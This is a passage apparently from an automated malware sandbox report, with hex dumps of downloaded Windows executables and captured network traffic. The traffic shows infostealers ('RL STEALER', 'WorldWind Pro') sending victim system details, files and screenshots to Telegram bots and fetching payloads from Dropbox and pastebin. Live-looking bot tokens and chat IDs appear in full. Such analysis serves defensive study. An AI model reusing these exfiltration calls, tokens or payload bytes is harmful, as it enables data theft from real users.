04 2a 1a 7e 16 00 00 04 2a 1e 02 80 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 1a 7e 18 00 00 04 2a 1e 02 80 18 00 00 04 2a 1a 7e 19 00 00 04 2a 1e 02 80 19 00 00 04 2a 1a 7e 1a 00 00 04 2a 1a 7e 1b 00 00 04 2a 1e 02 80 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 80 1c 00 00 04 2a 1a 7e 1d 00 00 04 2a 1e 02 80 1d 00 00 04 2a 2a 02 28 3e 00 00 0a 16 fe 03 2a 32 7e 0b 00 00 04 03 6f 3f 00 00 0a 2a 2e 73 18 00 00 0a 80 1a 00 00 04 2a e6 28 29 00 00 06 3a 28 00 00 00 28 2a 00 00 06 3a 1e 00 00 00 28 2b 00 00 06 3a 14 00 00 00 28 27 00 00 06 3a 0a 00 00 00 28 28 00 00 06 39 06 00 00 00 14 28 76 00 00 0a 2a 56 28 9c 00 00 0a 73 9d 00 00 0a 20 20 02 00 00 6f 9e 00 00 0a 2a 6e 7e 1e 00 00 04 39 10 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:24 GMTcontent-type: application/x-msdownloadcontent-length: 64512server: nginxlast-modified: Wed, 03 Jul 2024 23:16:12 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 37 48 62 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ea 00 00 00 10 00 00 00 00 00 00 9e 09 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 09 01 00 53 00 00 00 00 20 01 00 f5 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 e9 00 00 00 20 00 00 00 ea 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f5 0d 00 00 00 20 01 00 00 0e 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 09 01 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 65 00 00 68 a3 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 57 00 07 80 c2 18 00 48 33 c0 c3 00 00 00 00 b8 57 00 07 80 c3 00 00 33 c0 c2 14 00 00 00 00 2e 00 2f 00 5c 00 00 00 1e 02 28 1b 00 00 0a 2a 1a 7e 14 00 00 04 2a 1e 02 80 14 00 00 04 2a 1a 7e 15 00 00 04 2a 1e 02 80 15 00 00 04 2a 1a 7e 16 00 00 04 2a 1e 02 80 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 1a 7e 18 00 00 04 2a 1e 02 80 18 00 00 04 2a 1a 7e 19 00 00 04 2a 1e 02 80 19 00 00 04 2a 1a 7e 1a 00 00 04 2a 1e 02 80 1a 00 00 04 2a 1a 7e 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 80 1c 00 00 04 2a 1a 7e 1d 00 00 04 2a 1e 02 80 1d 00 00 04 2a 1a 7e 1e 00 00 04 2a 1e 02 80 1e 00 00 04 2a 2a 02 28 43 00 00 0a 16 fe 03 2a 32 7e 0b 00 00 04 03 6f 44 00 00 0a 2a fa 73 bd 00 00 06 25 72 bd 12 00 70 6f a8 00 00 06 28 68 00 00 0a 72 85 13 00 70 28 1d 00 00 0a 6f 1e 00 00 0a 6f b5 00 00 06 6f b2 00 00 06 28 20 00 00 06 20 e8 03 00 00 28 17 00 00 0a 2a da 73 bd 00 00 06 25 72 bd 12 00 70 6f a8 00 00 06 72 9f 13 00 70 6f b5 00 00 06 25 72 9f 13 00 70 6f a8 00 00 06 02 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:25 GMTcontent-type: application/x-msdownloadcontent-length: 307712server: nginxlast-modified: Thu, 04 Jul 2024 00:04:16 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 02 03 00 57 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 14 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 62 00 6d 00 74 00 69 00 61 00 57 00 68 00 6d 0
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C3CBD.tmp.Installer.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument?chat_id=-4206528371&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:27%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9ea4f458eb80Host: api.telegram.orgContent-Length: 674280Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-07-06%207:27:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="4218323f-0b5f-4f02-ae6c-04af12749150"Host: api.telegram.orgContent-Length: 142488Expect: 100-continue
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-07-06%207:27:25%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="5b073ce5-982c-4d6f-86c1-5eb9016cb213"Host: api.telegram.orgContent-Length: 142488Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="2ac1b142-5e04-41ec-aec2-aa44ac23098b"Host: api.telegram.orgContent-Length: 137522Expect: 100-continue
                      Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="756f27b2-8e1e-41d6-84d0-70bf6be4b848"Host: api.telegram.orgContent-Length: 137522Expect: 100-continue
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7347450494:AAG6CMHwBd3FeRdexRASKIMPj2MuZf6S2dw/sendDocument?chat_id=212019462&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:28%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9